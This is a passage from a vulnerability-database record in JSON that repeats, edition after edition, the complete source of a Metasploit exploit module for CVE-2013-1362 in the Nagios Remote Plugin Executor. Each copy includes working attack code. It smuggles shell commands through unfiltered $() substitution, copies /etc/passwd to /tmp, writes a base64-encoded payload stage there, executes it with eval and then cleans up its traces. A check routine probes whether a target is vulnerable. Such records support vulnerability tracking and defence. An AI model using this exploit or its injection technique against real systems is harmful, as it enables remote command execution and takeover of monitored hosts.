datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-08-21T15:30:09", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T01:17:44", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T01:17:44", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T03:15:35", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T03:15:35", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T15:37:36", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T15:37:36", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T19:39:02", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T19:39:02", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T09:38:44", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
